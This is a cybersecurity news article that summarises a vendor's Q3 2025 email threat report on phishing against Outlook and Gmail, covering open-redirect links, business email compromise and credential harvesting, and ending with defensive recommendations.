Threat actors are systematically compromising Outlook and Google mailboxes with alarming success, leveraging sophisticated techniques that sidestep traditional email defenses entirely.
According to VIPRE’s Q3 2025 Email Threat Report, over 90% of phishing attacks specifically target these two dominant email ecosystems, representing a calculated strategic shift by attackers seeking to maximize impact while minimizing operational complexity.
The data reveals a troubling reality: as technical defenses have strengthened, attackers have adapted by weaponizing trusted infrastructure against itself.
Rather than deploying cutting-edge malware or zero-day exploits, cybercriminals are using deceptively simple tactics deployed with unprecedented sophistication.
Free email services, including Gmail and Outlook, accounted for 32% of all spam campaigns observed in Q3, with attackers leveraging these platforms’ inherent trustworthiness and easy account rotation to maintain high deliverability rates.
The Evasion Tactics
The most alarming trend involves compromised URLs that operate as open redirects. These attacks begin with legitimate domain names but append parameters that instruct servers to redirect users to malicious destinations.
According to the report, 90.5% of phishing links employ this open redirect technique, compared to just 7.3% using direct malicious links.
This distinction matters significantly: open redirects exploit the trusted reputation of legitimate domains, making them nearly invisible to standard email security tools that only scan surface-level URLs.
Phishing, Scams, and Malware.
Additionally, threat actors registered new domains at unprecedented rates in Q3, with a threefold spike in newly registered domain creation between July and August.
These disposable infrastructure elements enable rapid campaign launches followed by swift deactivation once security teams implement denylists a classic example of attackers staying one step ahead of reactive defenses.
Business Email Compromise (BEC) attacks constitute 51% of all malicious emails, maintaining their position as the most dangerous threat category.
A side-by-side comparison best illustrates the trends in the key phishing metrics we track every quarter.
What makes BEC particularly insidious is the social engineering component: impersonation tactics account for 63% of BEC attempts, with attackers increasingly moving conversations to unmonitored channels like WhatsApp to evade email-based detection systems entirely.
The report documents that CEOs remain the most impersonated individuals, followed by IT personnel, HR departments, and managers.
Attackers craft highly targeted scenarios around financial processes, HR functions, and confidential communications all high-urgency scenarios designed to bypass human judgment under pressure.
The Credential Harvesting Operation
Phishing attachments reveal another critical vulnerability. The report found that 90% of phishing attachments target Outlook or Google specifically, with attackers favoring PDF attachments because they carry implicit legitimacy as business documents.
A significant portion of the analyzed emails were AI-generated, indicating that threat actors are increasingly using automated content creation to make spam and phishing messages more convincing.
Threefold increase in NRD creation between July and August, and then again between August and September.
Credential harvesting accounts for the entire focus of these campaigns, with threat actors increasingly employing the Fetch API method for data exfiltration rather than standard POST requests a technical evolution indicating more sophisticated threat actors entering the space.
The infrastructure gaps are profound. Malicious emails increased 13% year-over-year, with VIPRE processing 1.8 billion emails quarterly and detecting 234 million as spam.
Yet the truly dangerous subset roughly 150,000 newly discovered malicious attachments caught only through sandboxing represents the attacks that would bypass traditional content and link-based filters.
Threat actors are leveraging Apple’s TestFlight beta distribution platform to
deliver malicious iOS builds to targeted users.
The geographic distribution compounds the problem. Over 60% of spam originated from U.S. IP addresses, not necessarily because attacks come from America, but because attackers deliberately rent U.S.-based servers whose strong reputation scores bypass security filters designed to flag suspicious international sources.
Organizations relying on legacy email security tools face an uncomfortable truth: signature-based detection and static denylists have become obsolete.
The attack landscape now demands behavioral analysis, real-time sandboxing, and AI-driven detection capable of identifying threats at click time.
Companies must implement mandatory multi-factor authentication to prevent credential compromise from escalating into account takeover the critical failure point where attackers gain permanent access to organizational systems.
With Q3 data demonstrating that successful attacks exploit human psychology rather than technical vulnerabilities, a layered defense approach combining technology and user education has shifted from recommended practice to organizational necessity.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.